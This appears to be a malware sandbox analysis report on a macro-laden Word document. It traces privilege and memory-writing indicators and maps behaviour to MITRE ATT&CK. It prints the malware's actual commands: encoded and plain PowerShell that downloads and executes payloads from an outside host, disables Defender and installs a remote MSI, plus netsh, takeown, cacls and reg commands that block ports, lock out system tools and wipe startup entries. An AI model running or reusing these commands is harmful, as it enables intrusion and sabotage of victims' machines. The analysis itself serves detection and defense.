2612	powershell.exe
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe
2812	powershell.exe
2748	powershell.exe
1624	msiexec.exe
1624	msiexec.exe
2256	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	PowerShell.exe
Token: SeDebugPrivilege	2612	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeShutdownPrivilege	2748	powershell.exe
Token: SeIncreaseQuotaPrivilege	2748	powershell.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeSecurityPrivilege	1624	msiexec.exe
Token: SeCreateTokenPrivilege	2748	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2748	powershell.exe
Token: SeLockMemoryPrivilege	2748	powershell.exe
Token: SeIncreaseQuotaPrivilege	2748	powershell.exe
Token: SeMachineAccountPrivilege	2748	powershell.exe
Token: SeTcbPrivilege	2748	powershell.exe
Token: SeSecurityPrivilege	2748	powershell.exe
Token: SeTakeOwnershipPrivilege	2748	powershell.exe
Token: SeLoadDriverPrivilege	2748	powershell.exe
Token: SeSystemProfilePrivilege	2748	powershell.exe
Token: SeSystemtimePrivilege	2748	powershell.exe
Token: SeProfSingleProcessPrivilege	2748	powershell.exe
Token: SeIncBasePriorityPrivilege	2748	powershell.exe
Token: SeCreatePagefilePrivilege	2748	powershell.exe
Token: SeCreatePermanentPrivilege	2748	powershell.exe
Token: SeBackupPrivilege	2748	powershell.exe
Token: SeRestorePrivilege	2748	powershell.exe
Token: SeShutdownPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeAuditPrivilege	2748	powershell.exe
Token: SeSystemEnvironmentPrivilege	2748	powershell.exe
Token: SeChangeNotifyPrivilege	2748	powershell.exe
Token: SeRemoteShutdownPrivilege	2748	powershell.exe
Token: SeUndockPrivilege	2748	powershell.exe
Token: SeSyncAgentPrivilege	2748	powershell.exe
Token: SeEnableDelegationPrivilege	2748	powershell.exe
Token: SeManageVolumePrivilege	2748	powershell.exe
Token: SeImpersonatePrivilege	2748	powershell.exe
Token: SeCreateGlobalPrivilege	2748	powershell.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeShutdownPrivilege	2056	powercfg.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeTakeOwnershipPrivilege	788	takeown.exe
Token: SeTakeOwnershipPrivilege	1684	takeown.exe
Token: SeTakeOwnershipPrivilege	1376	takeown.exe
Token: SeTakeOwnershipPrivilege	1848	takeown.exe
Token: SeTakeOwnershipPrivilege	2440	takeown.exe
Token: SeTakeOwnershipPrivilege	2220	takeown.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe
Token: SeRestorePrivilege	1624	msiexec.exe
Token: SeTakeOwnershipPrivilege	1624	msiexec.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2016	WINWORD.EXE
2016	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 1140	2016	WINWORD.EXE	28
PID 2016 wrote to memory of 1140	2016	WINWORD.EXE	28
PID 2016 wrote to memory of 1140	2016	WINWORD.EXE	28
PID 2016 wrote to memory of 1140	2016	WINWORD.EXE	28
PID 2016 wrote to memory of 2644	2016	WINWORD.EXE	29
PID 2016 wrote to memory of 2644	2016	WINWORD.EXE	29
PID 2016 wrote to memory of 2644	2016	WINWORD.EXE	29
PID 2016 wrote to memory of 2644	2016	WINWORD.EXE	29
PID 2644 wrote to memory of 2612	2644	PowerShell.exe	33
PID 2644 wrote to memory of 2612	2644	PowerShell.exe	33
PID 2644 wrote to memory of 2612	2644	PowerShell.exe	33
PID 2644 wrote to memory of 2612	2644	PowerShell.exe	33
PID 2612 wrote to memory of 2812	2612	powershell.exe	34
PID 2612 wrote to memory of 2812	2612	powershell.exe	34
PID 2612 wrote to memory of 2812	2612	powershell.exe	34
PID 2612 wrote to memory of 2812	2612	powershell.exe	34
PID 2812 wrote to memory of 2748	2812	powershell.exe	35
PID 2812 wrote to memory of 2748	2812	powershell.exe	35
PID 2812 wrote to memory of 2748	2812	powershell.exe	35
PID 2812 wrote to memory of 2748	2812	powershell.exe	35
PID 2748 wrote to memory of 1500	2748	powershell.exe	36
PID 2748 wrote to memory of 1500	2748	powershell.exe	36
PID 2748 wrote to memory of 1500	2748	powershell.exe	36
PID 2748 wrote to memory of 1500	2748	powershell.exe	36
PID 1500 wrote to memory of 1248	1500	csc.exe	37
PID 1500 wrote to memory of 1248	1500	csc.exe	37
PID 1500 wrote to memory of 1248	1500	csc.exe	37
PID 1500 wrote to memory of 1248	1500	csc.exe	37
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 572	1624	msiexec.exe	39
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1624 wrote to memory of 1980	1624	msiexec.exe	41
PID 1980 wrote to memory of 2056	1980	MsiExec.exe	42
PID 1980 wrote to memory of 2056	1980	MsiExec.exe	42
PID 1980 wrote to memory of 2056	1980	MsiExec.exe	42
PID 1980 wrote to memory of 2056	1980	MsiExec.exe	42
PID 1980 wrote to memory of 2256	1980	MsiExec.exe	44
PID 1980 wrote to memory of 2256	1980	MsiExec.exe	44
PID 1980 wrote to memory of 2256	1980	MsiExec.exe	44
PID 1980 wrote to memory of 2256	1980	MsiExec.exe	44
PID 1980 wrote to memory of 1788	1980	MsiExec.exe	46
PID 1980 wrote to memory of 1788	1980	MsiExec.exe	46
PID 1980 wrote to memory of 1788	1980	MsiExec.exe	46
PID 1980 wrote to memory of 1788	1980	MsiExec.exe	46
PID 1980 wrote to memory of 1520	1980	MsiExec.exe	48
PID 1980 wrote to memory of 1520	1980	MsiExec.exe	48
PID 1980 wrote to memory of 1520	1980	MsiExec.exe	48
PID 1980 wrote to memory of 1520	1980	MsiExec.exe	48
PID 1980 wrote to memory of 1596	1980	MsiExec.exe	51
PID 1980 wrote to memory of 1596	1980	MsiExec.exe	51
PID 1980 wrote to memory of 1596	1980	MsiExec.exe	51
PID 1980 wrote to memory of 1596	1980	MsiExec.exe	51
PID 1980 wrote to memory of 3040	1980	MsiExec.exe	52
PID 1980 wrote to memory of 3040	1980	MsiExec.exe	52

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIABTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2748
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wgi_mj_m.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1500
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D2C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7D2B.tmp"
        7⤵
        
        PID:1248

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 89A881C08E51DEAAB6D34E207D33A546
  2⤵
  - Loads dropped DLL
  PID:572
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0CF18543665C24DC01D12DE92805D715 M Global\MSI0000
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\SysWOW64\powercfg.exe
    "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
    3⤵
    - Modifies data under HKEY_USERS
    PID:1788
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
    3⤵
    - Modifies data under HKEY_USERS
    PID:1520
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1596
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:3040
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2324
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2008
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2060
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2428
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2196
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2984
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2716
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2356
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2892
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:328
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2560
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2912
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1308
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1748
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2096
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
    3⤵
    - Modifies data under HKEY_USERS
    PID:1952
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
    3⤵
    - Modifies data under HKEY_USERS
    PID:108
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
    3⤵
    - Modifies data under HKEY_USERS
    PID:1704
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:788
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1848
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
    3⤵
    PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
    3⤵
    - Launches sc.exe
    PID:2716
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
    3⤵
    - Launches sc.exe
    PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

